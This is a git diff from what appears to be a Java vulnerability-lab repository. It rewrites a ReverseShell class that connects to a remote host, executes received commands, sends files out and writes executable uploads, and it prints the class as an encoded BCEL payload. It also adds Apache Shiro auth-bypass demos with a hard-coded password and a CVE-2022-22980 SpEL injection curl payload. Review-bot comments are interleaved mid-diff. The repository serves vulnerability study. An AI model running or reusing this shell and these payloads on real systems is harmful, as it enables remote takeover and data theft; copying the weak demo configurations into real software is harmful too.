ReverseShell(InputStream inputStream, OutputStream outputStream) { + this.inputStream = inputStream; + this.outputStream = outputStream; + new Thread(this).start(); + } - BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(socket.getInputStream())); - while (true) { - String line = bufferedReader.readLine(); - if (line.equals("exit")) - return; - Process pro = null; - try { - if (line.startsWith("${IFS}")) { - line = line.substring(6); - String[] cmd = line.split("\\$\\{IFS\\}"); - pro = Runtime.getRuntime().exec(cmd); - } else if 
(line.startsWith("download")) { - line = line.substring(8).trim(); - String[] cmd = line.split(" "); - String file = cmd[0]; - String ip = cmd[1]; - String port = cmd[2]; - byte[] bytes = Files.readAllBytes(Paths.get(file)); - Socket transferFileSocket = new Socket(ip, Integer.parseInt(port)); - transferFileSocket.getOutputStream().write(bytes); - transferFileSocket.getOutputStream().flush(); - transferFileSocket.getOutputStream().close(); - transferFileSocket.close(); - } else if (line.startsWith("upload")) { - line = line.substring(6).trim(); - String[] cmd = line.split(" "); - String file = cmd[0]; - String ip = cmd[1]; - String port = cmd[2]; - Socket transferFileSocket = new Socket(ip, Integer.parseInt(port)); - InputStream inputStream = transferFileSocket.getInputStream(); - Path path = Paths.get(file); - Files.copy(inputStream, path); - if (Files.exists(path)) { - File toSetFile = path.toFile(); - toSetFile.setExecutable(true); - toSetFile.setReadable(true); - toSetFile.setWritable(true); - } - inputStream.close(); - transferFileSocket.close(); - } else { - pro = Runtime.getRuntime().exec(line); - } - } catch (Exception e) { - bufferedWriter.write(e.getMessage()); - bufferedWriter.newLine(); - bufferedWriter.flush(); - } - if (pro == null) { - continue; - } + @Override + public void run() { + if (outputStream != null && inputStream != null) { + try { + BufferedWriter bufferedWriter = new BufferedWriter(new OutputStreamWriter(outputStream)); + BufferedReader read = new BufferedReader(new InputStreamReader(inputStream)); + String line2; + while ((line2 = read.readLine()) != null) { + bufferedWriter.write(line2); + bufferedWriter.newLine(); + bufferedWriter.flush(); + } + } catch (Exception e) { + } + } else { + try { + Socket socket = new Socket(ip, port); + BufferedWriter bufferedWriter = new BufferedWriter( + new OutputStreamWriter(socket.getOutputStream())); + bufferedWriter.write("success!"); + bufferedWriter.newLine(); + bufferedWriter.flush(); - new 
ReverseShell(pro.getInputStream(), socket.getOutputStream()); - new ReverseShell(pro.getErrorStream(), socket.getOutputStream()); - } + BufferedReader bufferedReader = new BufferedReader( + new InputStreamReader(socket.getInputStream())); + while (true) { + String line = bufferedReader.readLine(); + if (line.equals("exit")) { + return; + } + Process pro = null; + try { + if (line.startsWith("${IFS}")) { + line = line.substring(6); + String[] cmd = line.split("\\$\\{IFS\\}"); + pro = Runtime.getRuntime().exec(cmd); + } else if (line.startsWith("download")) { + line = line.substring(8).trim(); + String[] cmd = line.split(" "); + String file = cmd[0]; + String ip = cmd[1]; + String port = cmd[2]; + byte[] bytes = Files.readAllBytes(Paths.get(file)); + Socket transferFileSocket = new Socket(ip, Integer.parseInt(port)); + transferFileSocket.getOutputStream().write(bytes); + transferFileSocket.getOutputStream().flush(); + transferFileSocket.getOutputStream().close(); + transferFileSocket.close(); + } else if (line.startsWith("upload")) { + line = line.substring(6).trim(); + String[] cmd = line.split(" "); + String file = cmd[0]; + String ip = cmd[1]; + String port = cmd[2]; + Socket transferFileSocket = new Socket(ip, Integer.parseInt(port)); + InputStream inputStream = transferFileSocket.getInputStream(); + Path path = Paths.get(file); + Files.copy(inputStream, path); + if (Files.exists(path)) { + File toSetFile = path.toFile(); + toSetFile.setExecutable(true); + toSetFile.setReadable(true); + toSetFile.setWritable(true); + } + inputStream.close(); + transferFileSocket.close(); + } else { + pro = Runtime.getRuntime().exec(line); + } + } catch (Exception e) { + bufferedWriter.write(e.getMessage()); + bufferedWriter.newLine(); + bufferedWriter.flush(); + } + if (pro == null) { + continue; + } - } catch (IOException e) {} + new ReverseShell(pro.getInputStream(), socket.getOutputStream()); + new ReverseShell(pro.getErrorStream(), socket.getOutputStream()); } + + } catch 
(IOException e) { + } } + } - public static void main(String[] args) throws Exception { - InputStream inputStream = ReverseShell.class.getResourceAsStream("ReverseShell.class"); - byte[] bytes = new byte[inputStream.available()]; - inputStream.read(bytes); - String code = Utility.encode(bytes, true); - System.out.println(Base64.getEncoder().encodeToString(("$$BCEL$$" + code).getBytes())); + public static void main(String[] args) throws Exception { + InputStream inputStream = ReverseShell.class.getResourceAsStream("ReverseShell.class"); + byte[] bytes = new byte[inputStream.available()]; + inputStream.read(bytes); + String code = Utility.encode(bytes, true); + System.out.println(Base64.getEncoder().encodeToString(("$$BCEL$$" + code).getBytes())); // new ReverseShell("127.0.0.1", 12345); - } + } } \ No newline at end of file diff --git a/pom.xml b/pom.xml index 2a018d87..e09a4391 100644 --- a/pom.xml +++ b/pom.xml @@ -1,6 +1,7 @@ - 4.0.0 @@ -27,7 +28,6 @@ nexus apache-poi java-compile - auth-bypass(shiro=1.7.1) learn-java-bug @@ -56,56 +56,45 @@ - - - - - + + + + + - - - - - - - - - - - + + + + + - - - - - - - - - - - - - - - - - - - - - - - - - - - - + + + + + + + + + + + + + + + + + + + + + + + diff --git a/shiro/auth-bypass(shiro<=1.4.1)/pom.xml b/shiro/auth-bypass-shiro-1-4-1/pom.xml similarity index 96% rename from shiro/auth-bypass(shiro<=1.4.1)/pom.xml rename to shiro/auth-bypass-shiro-1-4-1/pom.xml index 9e5ff66b..18215b3a 100644 --- a/shiro/auth-bypass(shiro<=1.4.1)/pom.xml +++ b/shiro/auth-bypass-shiro-1-4-1/pom.xml @@ -10,7 +10,7 @@ 4.0.0 - auth-bypass-shiro-1.4.1 + auth-bypass-shiro-1-4-1 
diff --git a/shiro/auth-bypass(shiro<1.5.2)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/Application.java b/shiro/auth-bypass-shiro-1-4-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/Application.java similarity index 100% rename from shiro/auth-bypass(shiro<1.5.2)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/Application.java rename to shiro/auth-bypass-shiro-1-4-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/Application.java diff --git a/shiro/auth-bypass(shiro<=1.4.1)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java b/shiro/auth-bypass-shiro-1-4-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java similarity index 100% rename from shiro/auth-bypass(shiro<=1.4.1)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java rename to shiro/auth-bypass-shiro-1-4-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java diff --git a/shiro/auth-bypass(shiro<=1.4.1)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java b/shiro/auth-bypass-shiro-1-4-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java similarity index 100% rename from shiro/auth-bypass(shiro<=1.4.1)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java rename to shiro/auth-bypass-shiro-1-4-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java diff --git a/shiro/auth-bypass(shiro<1.5.2)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java b/shiro/auth-bypass-shiro-1-4-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java similarity index 100% rename from shiro/auth-bypass(shiro<1.5.2)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java rename to shiro/auth-bypass-shiro-1-4-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java 
diff --git a/shiro/auth-bypass(shiro<1.5.2)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java b/shiro/auth-bypass-shiro-1-4-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java similarity index 100% rename from shiro/auth-bypass(shiro<1.5.2)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java rename to shiro/auth-bypass-shiro-1-4-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java diff --git a/shiro/auth-bypass(shiro<1.5.2)/pom.xml b/shiro/auth-bypass-shiro-1-5-1/pom.xml similarity index 95% rename from shiro/auth-bypass(shiro<1.5.2)/pom.xml rename to shiro/auth-bypass-shiro-1-5-1/pom.xml index ae213b03..92fb2643 100644 --- a/shiro/auth-bypass(shiro<1.5.2)/pom.xml +++ b/shiro/auth-bypass-shiro-1-5-1/pom.xml @@ -10,7 +10,7 @@ 4.0.0 - auth-bypass-cve-2020-1957 + auth-bypass-shiro-1-5-1 diff --git a/shiro/auth-bypass(shiro<=1.4.1)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/Application.java b/shiro/auth-bypass-shiro-1-5-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/Application.java similarity index 100% rename from shiro/auth-bypass(shiro<=1.4.1)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/Application.java rename to shiro/auth-bypass-shiro-1-5-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/Application.java diff --git a/shiro/auth-bypass(shiro<1.5.2)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java b/shiro/auth-bypass-shiro-1-5-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java similarity index 100% rename from shiro/auth-bypass(shiro<1.5.2)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java rename to shiro/auth-bypass-shiro-1-5-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java 
diff --git a/shiro/auth-bypass(shiro<1.5.2)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java b/shiro/auth-bypass-shiro-1-5-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java similarity index 100% rename from shiro/auth-bypass(shiro<1.5.2)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java rename to shiro/auth-bypass-shiro-1-5-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java diff --git a/shiro/auth-bypass(shiro<=1.4.1)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java b/shiro/auth-bypass-shiro-1-5-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java similarity index 100% rename from shiro/auth-bypass(shiro<=1.4.1)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java rename to shiro/auth-bypass-shiro-1-5-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java diff --git a/shiro/auth-bypass(shiro<=1.4.1)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java b/shiro/auth-bypass-shiro-1-5-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java similarity index 100% rename from shiro/auth-bypass(shiro<=1.4.1)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java rename to shiro/auth-bypass-shiro-1-5-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java diff --git a/shiro/auth-bypass(shiro<1.5.2)/src/main/resources/application.yml b/shiro/auth-bypass-shiro-1-5-1/src/main/resources/application.yml similarity index 100% rename from shiro/auth-bypass(shiro<1.5.2)/src/main/resources/application.yml rename to shiro/auth-bypass-shiro-1-5-1/src/main/resources/application.yml 
diff --git a/shiro/auth-bypass(shiro<1.5.3)/pom.xml b/shiro/auth-bypass-shiro-1-5-3/pom.xml similarity index 94% rename from shiro/auth-bypass(shiro<1.5.3)/pom.xml rename to shiro/auth-bypass-shiro-1-5-3/pom.xml index 386fe8d0..197a9891 100644 --- a/shiro/auth-bypass(shiro<1.5.3)/pom.xml +++ b/shiro/auth-bypass-shiro-1-5-3/pom.xml @@ -10,7 +10,7 @@ 4.0.0 - auth-bypass-cve-2020-11989 + auth-bypass-shiro-1-5-3 diff --git a/shiro/auth-bypass(shiro<1.5.3)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java b/shiro/auth-bypass-shiro-1-5-3/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java similarity index 100% rename from shiro/auth-bypass(shiro<1.5.3)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java rename to shiro/auth-bypass-shiro-1-5-3/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java diff --git a/shiro/auth-bypass(shiro<1.5.3)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java b/shiro/auth-bypass-shiro-1-5-3/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java similarity index 100% rename from shiro/auth-bypass(shiro<1.5.3)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java rename to shiro/auth-bypass-shiro-1-5-3/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java diff --git a/shiro/auth-bypass(shiro<1.5.3)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java b/shiro/auth-bypass-shiro-1-5-3/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java similarity index 100% rename from shiro/auth-bypass(shiro<1.5.3)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java rename to shiro/auth-bypass-shiro-1-5-3/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java 
diff --git a/shiro/auth-bypass(shiro<1.5.3)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java b/shiro/auth-bypass-shiro-1-5-3/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java similarity index 100% rename from shiro/auth-bypass(shiro<1.5.3)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java rename to shiro/auth-bypass-shiro-1-5-3/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java diff --git a/shiro/auth-bypass(shiro<1.5.3)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java b/shiro/auth-bypass-shiro-1-5-3/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java similarity index 100% rename from shiro/auth-bypass(shiro<1.5.3)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java rename to shiro/auth-bypass-shiro-1-5-3/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java diff --git a/shiro/auth-bypass(shiro<1.5.3)/src/main/resources/application.yml b/shiro/auth-bypass-shiro-1-5-3/src/main/resources/application.yml similarity index 100% rename from shiro/auth-bypass(shiro<1.5.3)/src/main/resources/application.yml rename to shiro/auth-bypass-shiro-1-5-3/src/main/resources/application.yml diff --git a/shiro/auth-bypass(shiro=1.7.1)/pom.xml b/shiro/auth-bypass-shiro-1-7-1/pom.xml similarity index 95% rename from shiro/auth-bypass(shiro=1.7.1)/pom.xml rename to shiro/auth-bypass-shiro-1-7-1/pom.xml index 8a78d05c..079c2a0a 100644 --- a/shiro/auth-bypass(shiro=1.7.1)/pom.xml +++ b/shiro/auth-bypass-shiro-1-7-1/pom.xml @@ -10,7 +10,7 @@ 4.0.0 - auth-bypass(shiro=1.7.1) + auth-bypass-shiro-1-7-1 8 
diff --git a/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java b/shiro/auth-bypass-shiro-1-7-1/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java similarity index 100% rename from shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java rename to shiro/auth-bypass-shiro-1-7-1/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java diff --git a/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java b/shiro/auth-bypass-shiro-1-7-1/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java similarity index 100% rename from shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java rename to shiro/auth-bypass-shiro-1-7-1/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java diff --git a/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java b/shiro/auth-bypass-shiro-1-7-1/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java similarity index 100% rename from shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java rename to shiro/auth-bypass-shiro-1-7-1/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java diff --git a/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java b/shiro/auth-bypass-shiro-1-7-1/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java similarity index 100% rename from shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java rename to shiro/auth-bypass-shiro-1-7-1/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java 
diff --git a/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java b/shiro/auth-bypass-shiro-1-7-1/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java similarity index 100% rename from shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java rename to shiro/auth-bypass-shiro-1-7-1/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java diff --git a/shiro/auth-bypass-shiro-1-8-0/pom.xml b/shiro/auth-bypass-shiro-1-8-0/pom.xml new file mode 100644 index 00000000..2de5d4ca --- /dev/null +++ b/shiro/auth-bypass-shiro-1-8-0/pom.xml @@ -0,0 +1,38 @@ + + + + org.springframework.boot + spring-boot-starter-parent + 1.5.22.RELEASE + + + 4.0.0 + + auth-bypass-shiro-1-8-0 + + + 8 + 8 + + + + + org.springframework.boot + spring-boot-starter-web + + + + org.apache.shiro + shiro-web + 1.8.0 + + + org.apache.shiro + shiro-spring + 1.8.0 + + + + \ No newline at end of file diff --git a/shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java b/shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java new file mode 100644 index 00000000..a134e7a3 --- /dev/null +++ b/shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java @@ -0,0 +1,13 @@ +package me.threedr3am.bug.shiro.bypass.auth; + +import org.springframework.boot.SpringApplication; +import org.springframework.boot.autoconfigure.SpringBootApplication; + +@SpringBootApplication +public class Application { + + public static void main(String[] args) { + SpringApplication.run(Application.class, args); + } + +} \ No newline at end of file 
diff --git a/shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java b/shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java new file mode 100644 index 00000000..90e77074 --- /dev/null +++ b/shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java @@ -0,0 +1,39 @@ +package me.threedr3am.bug.shiro.bypass.auth.config; + +import me.threedr3am.bug.shiro.bypass.auth.realm.MyRealm; +import org.apache.shiro.mgt.SecurityManager; +import org.apache.shiro.spring.web.ShiroFilterFactoryBean; +import org.apache.shiro.web.mgt.DefaultWebSecurityManager; +import org.springframework.context.annotation.Bean; +import org.springframework.context.annotation.Configuration; + +import java.util.LinkedHashMap; +import java.util.Map; + +/** + * @author threedr3am + */ +@Configuration +public class ShiroConfig { + @Bean + MyRealm myRealm() { + return new MyRealm(); + } + + @Bean + SecurityManager securityManager() { + DefaultWebSecurityManager manager = new DefaultWebSecurityManager(); + manager.setRealm(myRealm()); + return manager; + } + + @Bean + ShiroFilterFactoryBean shiroFilterFactoryBean() { + ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean(); + bean.setSecurityManager(securityManager()); + Map map = new LinkedHashMap(); + map.put("/bypass/*/index", "authc"); + bean.setFilterChainDefinitionMap(map); + return bean; + } +} diff --git a/shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java b/shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java new file mode 100644 index 00000000..91766574 --- /dev/null +++ b/shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java 
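Review bot: The only filter-chain entry in `shiroFilterFactoryBean()` is `map.put("/bypass/*/index", "authc")`, so any path that Spring MVC still routes to the controller but that this one Ant pattern does not match is served without authentication. This module's pom pins Spring Boot 1.5.22.RELEASE, where suffix pattern matching is presumably still enabled by default, and that is the mismatch the `index.html` curl line in BypassTestController depends on. Since the module is a deliberate reproduction, I would keep the rule but say so above it, e.g. `// intentionally narrow rule for the auth-bypass demo; a real chain ends with map.put("/**", "authc")`. The raw `Map`/`LinkedHashMap` should be `Map<String, String>`, unless the type arguments were only lost when the patch was rendered.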
@@ -0,0 +1,22 @@ +package me.threedr3am.bug.shiro.bypass.auth.controller; + +import org.springframework.web.bind.annotation.*; + +/** + * + * curl http://127.0.0.1:8080/bypass/threedr3am/index.html + * + * @author threedr3am + */ +@RestController +public class BypassTestController { + + /** + * @return + */ + @RequestMapping(value = "/bypass/{id}/index", method = RequestMethod.GET) + public String bypass(@PathVariable("id") String id) { + return "bypass -> " + id; + } + +} diff --git a/shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java b/shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java new file mode 100644 index 00000000..e7dd4586 --- /dev/null +++ b/shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java @@ -0,0 +1,29 @@ +package me.threedr3am.bug.shiro.bypass.auth.controller; + +import org.apache.shiro.SecurityUtils; +import org.apache.shiro.authc.AuthenticationException; +import org.apache.shiro.authc.UsernamePasswordToken; +import org.apache.shiro.subject.Subject; +import org.springframework.web.bind.annotation.RequestMapping; +import org.springframework.web.bind.annotation.RequestMethod; +import org.springframework.web.bind.annotation.RestController; + +/** + * @author threedr3am + */ +@RestController +public class LoginController { + + @RequestMapping(value = "/login", method = RequestMethod.POST) + public String login(String username, String password) { + Subject subject = SecurityUtils.getSubject(); + try { + subject.login(new UsernamePasswordToken(username, password)); + return "登录成功!"; + } catch (AuthenticationException e) { + e.printStackTrace(); + return "登录失败!"; + } + + } +} 
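Review bot: In `LoginController.login()`, the `catch (AuthenticationException e)` branch calls `e.printStackTrace()`, so failed logins go to stderr with no level, timestamp or account name and cannot be alerted on. I would declare a logger in the class and write `log.warn("login failed for user={}", username, e);`, never logging `password`. Because `username` and `password` are bound as plain request parameters, the POST also accepts them from the query string, where they tend to end up in access logs; binding them from the request body only avoids that.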
diff --git a/shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java b/shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java new file mode 100644 index 00000000..58d2897a --- /dev/null +++ b/shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java @@ -0,0 +1,24 @@ +package me.threedr3am.bug.shiro.bypass.auth.realm; + +import org.apache.shiro.authc.*; +import org.apache.shiro.authz.AuthorizationInfo; +import org.apache.shiro.realm.AuthorizingRealm; +import org.apache.shiro.subject.PrincipalCollection; + +/** + * @author threedr3am + */ +public class MyRealm extends AuthorizingRealm { + @Override + protected AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principals) { + return null; + } + @Override + protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken token) throws AuthenticationException { + String username = (String) token.getPrincipal(); + if (!"threedr3am".equals(username)) { + throw new UnknownAccountException("账户不存在!"); + } + return new SimpleAuthenticationInfo(username, "123456", getName()); + } +} diff --git a/shiro/pom.xml b/shiro/pom.xml index f108c2d1..1913fa2f 100644 --- a/shiro/pom.xml +++ b/shiro/pom.xml @@ -12,9 +12,11 @@ shiro pom - - auth-bypass(shiro=1.7.1) - auth-bypass-shiro-1.4.1 + auth-bypass-shiro-1-5-3 + auth-bypass-shiro-1-5-1 + auth-bypass-shiro-1-7-1 + auth-bypass-shiro-1-4-1 + auth-bypass-shiro-1-8-0 diff --git a/spring/pom.xml b/spring/pom.xml index 71ead017..680c8649 100644 --- a/spring/pom.xml +++ b/spring/pom.xml @@ -14,6 +14,7 @@ spring-boot-actuator-bug spring-cloud-config-server-CVE-2020-5410 + spring-data-mongodb-spel-CVE-2022-22980 diff --git a/spring/spring-data-mongodb-spel-CVE-2022-22980/README.md b/spring/spring-data-mongodb-spel-CVE-2022-22980/README.md new file mode 100644 index 00000000..4b533899 --- /dev/null 
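Review bot: `MyRealm.doGetAuthenticationInfo()` returns `new SimpleAuthenticationInfo(username, "123456", getName())`, a hard-coded plaintext credential, and nothing in the file says the realm is a fixture. A class comment such as `// demo realm: one fixed account with a fixed password, no roles or permissions; lab use only` would stop it being copied as a template. `doGetAuthorizationInfo()` returns `null`; returning `new SimpleAuthorizationInfo()` would state "no permissions" explicitly instead of relying on how callers treat a null result.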
+++ b/spring/spring-data-mongodb-spel-CVE-2022-22980/README.md @@ -0,0 +1,15 @@ +## CVE-2022-22980: Spring Data MongoDB SpEL Expression injection vulnerability through annotated repository query methods + +### 1. Run Java Server(not need MongoDB Server) +``` +com.threedr3am.bug.spring.data.mongodb.Application.main +``` + +### 2. payload +``` +curl --location --request POST 'http://127.0.0.1:8080/demo' \ +--header 'Content-Type: application/x-www-form-urlencoded' \ +--data-urlencode 'keyword=T(java.lang.String).forName('\''java.lang.Runtime'\'').getRuntime().exec('\''/System/Applications/Calculator.app/Contents/MacOS/Calculator'\'')' +``` + + diff --git a/spring/spring-data-mongodb-spel-CVE-2022-22980/pom.xml b/spring/spring-data-mongodb-spel-CVE-2022-22980/pom.xml new file mode 100644 index 00000000..b8648693 --- /dev/null +++ b/spring/spring-data-mongodb-spel-CVE-2022-22980/pom.xml @@ -0,0 +1,39 @@ + + + + org.springframework.boot + spring-boot-starter-parent + 2.6.8 + + 4.0.0 + + spring-data-mongodb-spel-CVE-2022-22980 + + + 8 + 8 + + + + + org.springframework.boot + spring-boot-starter-web + + + + + + + org.springframework.boot + spring-boot-starter-data-mongodb + + + + + + + + + \ No newline at end of file diff --git a/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/Application.java b/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/Application.java new file mode 100644 index 00000000..711c72a6 --- /dev/null +++ b/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/Application.java 
@@ -0,0 +1,15 @@
+package com.threedr3am.bug.spring.data.mongodb;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+/**
+ * @author threedr3am
+ */
+@SpringBootApplication
+public class Application {
+
+ public static void main(String[] args) {
+ SpringApplication.run(Application.class, args);
+ }
+}
diff --git a/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/controller/DemoController.java b/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/controller/DemoController.java
new file mode 100644
index 00000000..5377d465
--- /dev/null
+++ b/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/controller/DemoController.java
@@ -0,0 +1,22 @@
+package com.threedr3am.bug.spring.data.mongodb.controller;
+
+import com.threedr3am.bug.spring.data.mongodb.repository.DemoRepository;
+import java.util.List;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RequestParam;
+import org.springframework.web.bind.annotation.RestController;
+
+@RestController
+public class DemoController {
+
+ private final DemoRepository demoRepository;
+
+ public DemoController(DemoRepository demoRepository) {
+ this.demoRepository = demoRepository;
+ }
+
+ @RequestMapping(value = "/demo")
+ public List demo(@RequestParam(name = "keyword") String keyword) {
+ return demoRepository.findAllByIdLike(keyword);
+ }
+}
diff --git a/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/entity/Demo.java b/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/entity/Demo.java
new file mode 100644
index 00000000..e4674ff0
--- /dev/null
+++ b/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/entity/Demo.java
@@ -0,0 +1,9 @@
+package com.threedr3am.bug.spring.data.mongodb.entity;
+
+import org.springframework.data.mongodb.core.mapping.MongoId;
+
+public class Demo {
+
+ @MongoId
+ private String id;
+}
